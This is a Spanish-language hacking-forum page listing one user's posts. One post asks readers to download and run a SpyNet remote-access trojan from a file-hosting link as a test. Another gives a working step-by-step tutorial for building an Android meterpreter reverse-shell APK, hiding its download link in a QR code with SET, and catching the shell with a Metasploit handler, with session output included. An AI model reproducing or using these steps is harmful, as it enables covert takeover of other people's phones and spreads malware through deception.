Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - xXCalaveraXx

#1
Necesito que alguien se infecte para saber si funciona, se lo puede quitar y si funciona se lo desinstalo remotamente, no se si funciona asi que si alguien me puede ayudar que se los baje de aqui: http://www.mediafire.com/download/qgwbn1eg2i563a5/SpyNet_(2).rar


Gracias  ;D
#2
Gracias era attrition pero lastima que dejaran el defacement.
#3
Dudas Generales / Re:
29 Julio 2014, 20:01 PM
Lo siento esa no era, la web tenia un fondo negro y publicaban sus hacks y una captura de la web hackeada
#4
Noticias / Re:
29 Julio 2014, 14:37 PM
Claro que si xD
#5
El mejor sistema de pentesting es linux así que vete haciendo una idea ;D
#6
Bugs y Exploits / Re:
29 Julio 2014, 12:04 PM
Usa el w3af scan para buscar alguna vulnerabilidad sqlinject u otra.
#7
Bugs y Exploits / Duda sobre metasploit
29 Julio 2014, 12:01 PM
Tengo una duda sobre metasploit: ¿Metasploit viene con los últimos exploits gratis hasta la fecha? Y si no yo he intentado poner los de exploit-db pero el metasploit crashea, lo he reinstalado para que volviera a funcionar.Si viene con los últimos exploits ¿De que db se los descarga?
#8
Eso debe ser virus, escanea el pc o busca algún proceso raro. El mas gracioso que he visto es uno del rey xD
#9
Hace mucho tiempo encontre una web donde hackers publicaban las webs que hackeaban, no me acuerdo de su nombre ni tampoco consigo resultados ... ¿Alguien tiene idea de que web estoy diciendo????
#10
Muy facil con Metasploit y un pc con Ubuntu o una distribucion de linux
root@kali:~# msfupdate
2)Ahora vamos a crear el payload en forma de aplicación apk:
root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.39 R > /root/prueba.apk
En lhost debemos poner la ip de nuestra interfaz, si no sabemos cual es nuestra ip en ese momento ejecutamos ifconfig y nos aparecerá. Después le indicamos que lo cree en la ruta /root/ (carpeta personal) y que cree un archivo llamado prueba.apk
3)Para hacerlo mas realista subiremos dicho archivo a dropbox por ejemplo, para generar un link de descarga, en mi caso:
https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk
4) Ahora lo camuflaremos en un codigo QR escaneable para ello usaremos SET de la siguiente forma:
root@kali:~# se-toolkit
set>1
set>9
Enter the URL you want the QRCode to go to:https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk
Ahora SET nos dice lo siguiente:
  • QRCode has been generated under /root/.set/reports/qrcode_attack.png
    Este será el codigo QR el cual al ser escaneado por un dispositivo Android descarga la aplicación prueba.apk
    5)Ahora nos pondremos a la escucha para cuando alguien pique:
    root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
    6)En este caso por ser una prueba local usé mi propio teléfono, al abrir la instalación, en la terminal que abrimos en el paso 5, se nos abrirá una sesión de meterpreter con la cual ya podremos jugar a nuestro antojo.

    root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
  • Initializing modules...
    PAYLOAD => android/meterpreter/reverse_tcp
    LHOST => 0.0.0.0
  • Started reverse handler on 0.0.0.0:4444
  • Starting the payload handler...
  • Sending stage (39698 bytes) to 192.168.1.37
  • Meterpreter session 1 opened (192.168.1.39:4444 -> 192.168.1.37:52818) at 2013-08-25 14:31:44 +0200
    meterpreter > shell
    y ya estaremos en la maquina con android en una red local :)